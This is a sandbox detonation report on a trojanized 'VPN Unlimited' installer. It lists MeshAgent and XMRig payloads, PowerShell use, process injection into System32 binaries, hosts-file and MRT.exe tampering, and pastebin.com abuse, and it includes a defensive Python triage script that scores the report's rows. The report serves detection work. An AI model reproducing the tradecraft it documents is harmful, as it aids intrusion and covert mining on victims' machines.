Analysis Overview
SHA256
306acb2f7180dba3d077f0ab2ca0d22236c62e713c34533817c1814465eaa133
Threat Level: Known bad
The file VPN_Unlimited.exe was found to be: Known bad.
Malicious Activity Summary
MeshAgent
Detects MeshAgent payload
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Suspicious use of NtCreateProcessExOtherParentProcess
XMRig Miner payload
Modifies Windows Firewall
Drops file in Drivers directory
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Stops running service(s)
Creates new service(s)
Checks BIOS information in registry
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Power Settings
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
UPX packed file
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Unsigned PE
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Program crash
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies registry class
Uses Volume Shadow Copy service COM API
Kills process with taskkill
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-14 17:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-14 17:53
Reported
2024-10-14 17:56
Platform
win10v2004-20241007-en
Max time kernel
71s
Max time network
104s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2064 created 2576 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1160 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2240 created 2888 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 4608 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2240 created 2576 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\System32\dllhost.exe |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe | N/A |
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3380 set thread context of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 2380 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 1552 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 3636 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 1160 set thread context of 2296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4608 set thread context of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
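The rows in the OtherParentProcess, Drops file in Drivers directory, Drops file in System32 directory and SetThreadContext tables above describe one chain: a dropped binary (jgt.exe in Temp, the fake Chrome updater.exe in ProgramData) and PowerShell rewrite the thread context of freshly started System32 images (dialer.exe, dllhost.exe), while the same droppers write the hosts file and open MRT.exe for modification. The script below is an added example, not part of the sandbox report: it parses rows in this page's four-column table layout and re-scores them with a few analyst rules so the injection pairs, the spoofed-parent creations and the tampering events can be pulled out for hunting. The input rows are copied from the tables above (plus one benign svchost.exe row as a negative control); the System32/SysWOW64 boundary and the interpreter list are heuristics assumed by the example, not facts from the report.

```python
"""Re-score sandbox signature rows ("| Description | Indicator | Process | Target |" layout).
Added example for this page; the rules are analyst heuristics, not the sandbox's own logic."""
import re
from collections import Counter

# Constructed input: rows copied from the behavioral1 tables on this page, plus one benign
# svchost.exe row (CryptnetUrlCache) as a negative control that must not produce a finding.
REPORT_ROWS = r"""
| Description | Indicator | Process | Target |
| PID 2064 created 2576 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 1160 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2240 created 2888 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 4608 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2240 created 2576 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\System32\dllhost.exe |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| PID 3380 set thread context of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 2380 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 1552 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 3636 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 1160 set thread context of 2296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4608 set thread context of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
"""

# Heuristic boundaries assumed by this example (not taken from the report).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
PPID_RE = re.compile(r"^PID (\d+) created (\d+)$")
CTX_RE = re.compile(r"^PID (\d+) set thread context of (\d+)$")


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def trusted_system_binary(path):
    """System32/SysWOW64 image that is not a script or command interpreter."""
    return in_system_dir(path) and basename(path) not in INTERPRETERS


def parse_rows(text):
    """Return a dict per four-column data row; the header row is skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":
            continue
        rows.append(dict(zip(("description", "indicator", "process", "target"), cells)))
    return rows


def _finding(rule, severity, detail, row):
    return {"rule": rule, "severity": severity, "detail": detail,
            "process": row["process"], "target": row["target"]}


def triage(text):
    findings = []
    for row in parse_rows(text):
        desc, ind, proc, tgt = row["description"], row["indicator"], row["process"], row["target"]
        ctx = CTX_RE.match(desc)
        if ctx and in_system_dir(tgt) and not trusted_system_binary(proc):
            # SetThreadContext from a dropped binary or an interpreter into a System32 image:
            # the hollowing pattern (jgt.exe/updater.exe -> dialer.exe, powershell -> dllhost.exe).
            findings.append(_finding("thread_context_injection", "high",
                f"{basename(proc)} (PID {ctx[1]}) set thread context of {basename(tgt)} (PID {ctx[2]})", row))
            continue
        ppid = PPID_RE.match(desc)
        if ppid:
            # Child created under a parent other than the real creator (PPID spoofing).
            findings.append(_finding("parent_spoofing", "medium",
                f"{basename(proc)} (PID {ppid[1]}) created {basename(tgt)} (PID {ppid[2]}) with another parent", row))
            continue
        if ind.lower().endswith("\\drivers\\etc\\hosts") and not in_system_dir(proc):
            findings.append(_finding("hosts_file_tampering", "high", f"{basename(proc)}: {desc} {ind}", row))
        elif ind.lower() == "c:\\windows\\system32\\mrt.exe" and not in_system_dir(proc):
            # Non-system process opening the Malicious Software Removal Tool binary for write.
            findings.append(_finding("security_tool_tampering", "high", f"{basename(proc)}: {desc} {ind}", row))
    return findings


def summarize(findings):
    return Counter(f["rule"] for f in findings)


def non_system_actors(findings):
    """Acting executables outside System32/SysWOW64: the paths to sweep for on other hosts."""
    return sorted({f["process"] for f in findings if not in_system_dir(f["process"])})


if __name__ == "__main__":
    results = triage(REPORT_ROWS)
    for f in results:
        print(f"[{f['severity']:6}] {f['rule']:26} {f['detail']}")
    print("sweep for:", *non_system_actors(results), sep="\n  ")
```

Run as-is it reports 15 findings from the 16 data rows (the svchost.exe control row yields none) and reduces the actor list to the two dropped executables, which is the pivot an analyst would take to other hosts; the hollowed targets come out as dialer.exe and dllhost.exe. Because the parser only needs the four-column layout, rows from any other signature table on this page can be appended to the input without changing the rules.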
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-PUHET.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-JOTU5.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-3C56O.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-UKKDV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-7BA5B.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-2DM01.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-GO0H6.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-94EC3.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\imageformats\qgif.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\wireguard.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\vccorlib140.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-synch-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-P0RRE.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-LLAVV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-GL69A.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-UGC9D.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\imageformats\qico.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-CS5IM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\tunnel.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-A9COT.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-5B0RG.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-GQIEG.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-BVM42.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-localization-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Window.2\is-10U63.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-0HU9E.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-UAGH5.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-A6PV4.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-H9AKP.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-datetime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-B1CDJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-00GOI.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-E30C5.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-HGHEV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-A1S4H.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-8UEJ8.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\is-TE462.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-VLMTK.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-timezone-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-IIJUL.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Window.2\is-4V264.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-processenvironment-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5WebEngineWidgets.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-interlocked-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-1OA7G.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-2KRAN.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-4US5J.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-KVHSM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5QmlModels.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-3FKLM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-VJN7U.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-EJJVT.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Layouts\is-F0U41.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-V6ATA.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-B1GIH.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-TSLBI.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Templates.2\is-RCJ2I.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-4UOEM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-QUOQG.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
